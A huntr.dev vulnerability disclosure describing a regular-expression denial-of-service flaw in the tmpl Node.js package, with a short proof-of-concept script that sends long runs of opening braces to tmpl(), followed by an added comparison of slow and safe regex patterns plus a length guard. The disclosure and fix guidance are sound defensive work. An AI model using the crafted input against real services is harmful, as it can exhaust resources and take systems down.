huntr, Yetingli, A07B547A-F457-41C9-9D89-EE48BEE8A4DF
Sep 04, 2021 - 4:23 p.m.

Inefficient Regular Expression Complexity in daaku/nodejs-tmpl

2021-09-04 16:23:45
yetingli
www.huntr.dev
14

EPSS: 0.001 (Low)
Percentile: 45.7%

✍️ Description

It can cause a denial of service when formatting a crafted string.

🕵️‍♂️ Proof of Concept

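// PoC.js
var tmpl = require("tmpl")
// Each iteration grows the input by 10000 "{" characters and times one tmpl() call.
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // Many opening braces followed by a key, with no closing brace.
    var attack_str = "" + "{".repeat(i * 10000) + "answer";
    tmpl(attack_str, { answer: 42 })
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}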

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.
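
Why an input shaped like the PoC's is slow for a backtracking regex, as an added example that is not part of the original report or of the tmpl code base. Both patterns, the `render` helper and the length guard are constructed for illustration (assumptions, not the project's source); the block times a lazy `{...}` pattern against one whose body excludes braces.

```javascript
// Added example. Both patterns are constructed for illustration; neither is
// copied from the tmpl source.

// Lazy "anything up to the next }" body: for every "{" that has no "}" after
// it, the engine scans to the end of the input before giving up, so n opening
// braces cost on the order of n*n character steps.
const SLOW = /{([\s\S]+?)}/g;
// Body may not contain braces: an unmatched "{" fails after one character.
const FAST = /{([^{}]+)}/g;

// Hypothetical {key} renderer, parameterised on the pattern under test.
// Unknown keys are left in place.
function render(pattern, str, data) {
  return str.replace(pattern, (whole, key) =>
    Object.prototype.hasOwnProperty.call(data, key) ? String(data[key]) : whole);
}

// Same input shape as the PoC: n opening braces, then a word, never a "}".
function pocInput(n) {
  return "{".repeat(n) + "answer";
}

// Wall-clock milliseconds for one render call.
function timeMs(pattern, input) {
  const start = Date.now();
  render(pattern, input, { answer: 42 });
  return Date.now() - start;
}

// Second layer of defence: refuse templates above a size the caller expects.
// The 4096 default is an arbitrary illustrative limit.
function renderBounded(str, data, maxLen = 4096) {
  if (str.length > maxLen) throw new RangeError("template too long");
  return render(FAST, str, data);
}

// Doubling n roughly quadruples the SLOW time; FAST stays flat.
for (const n of [2000, 4000, 8000]) {
  const input = pocInput(n);
  console.log(`n=${n} slow=${timeMs(SLOW, input)}ms fast=${timeMs(FAST, input)}ms`);
}
```

The two patterns differ on templates whose keys contain braces, so check existing templates before swapping one for the other.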
